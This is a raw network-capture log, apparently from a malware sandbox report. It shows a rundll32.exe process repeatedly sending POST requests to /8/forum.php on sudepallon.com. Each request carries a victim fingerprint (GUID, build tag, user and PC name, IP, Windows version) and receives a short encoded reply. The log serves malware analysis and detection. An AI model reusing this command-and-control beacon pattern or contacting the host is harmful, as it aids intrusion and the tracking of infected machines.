                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:07.418070078 CEST367INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:08 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cGZATARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        66192.168.2.224923177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:07.698235035 CEST368OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:07.767000914 CEST368INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:09 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 56 4e 4d 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cVNMEARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        67192.168.2.224923277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:08.057290077 CEST369OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:08.123681068 CEST369INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:09 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 48 56 45 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cHVESARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        68192.168.2.224923377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:08.396713018 CEST370OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:08.464003086 CEST370INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:10 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4b 4e 4d 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cKNMPARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        69192.168.2.224923477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:08.748478889 CEST371OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:08.820357084 CEST372INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:10 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZYBAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        795.213.179.6780192.168.2.2249172C:\Windows\SysWOW64\svchost.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        70192.168.2.224923577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:09.105807066 CEST372OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:09.173655033 CEST373INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:10 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4a 47 54 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cJGTQARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        71192.168.2.224923677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:09.458430052 CEST374OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:09.527733088 CEST374INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:11 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 48 53 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZHSAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        72192.168.2.224923777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:09.803426027 CEST375OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:09.871731997 CEST375INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:11 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 46 42 59 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cFBYUARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        73192.168.2.224923877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:10.145229101 CEST376OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:10.214044094 CEST376INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:11 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 56 48 53 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cVHSEARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        74192.168.2.224923977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:10.490418911 CEST377OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:10.561532974 CEST377INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:12 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cBJQYARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        75192.168.2.224924077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:10.858552933 CEST378OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:10.927478075 CEST378INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:12 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 43 58 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZCXAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        76192.168.2.224924177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:11.208978891 CEST379OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:11.273643970 CEST379INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:12 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZZAAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        77192.168.2.224924277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:11.551534891 CEST380OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:11.619101048 CEST381INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:13 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZJQAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        78192.168.2.224924377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:11.894423962 CEST381OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:11.960788012 CEST382INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:13 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4d 4e 4d 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cMNMNARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        79192.168.2.224924477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:12.233371019 CEST383OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:12.298418999 CEST383INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:13 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cMTGNARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        8192.168.2.224917377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:44.821758032 CEST296OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:44.887322903 CEST297INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:46 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 47 59 42 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cGYBTARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        80192.168.2.224924577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:12.584036112 CEST384OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:12.651797056 CEST384INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:14 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 46 4d 4e 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cFMNUARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        81192.168.2.224924677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:12.933389902 CEST385OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:12.999862909 CEST385INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:14 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 43 4a 51 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cCJQXARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        82192.168.2.224924777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
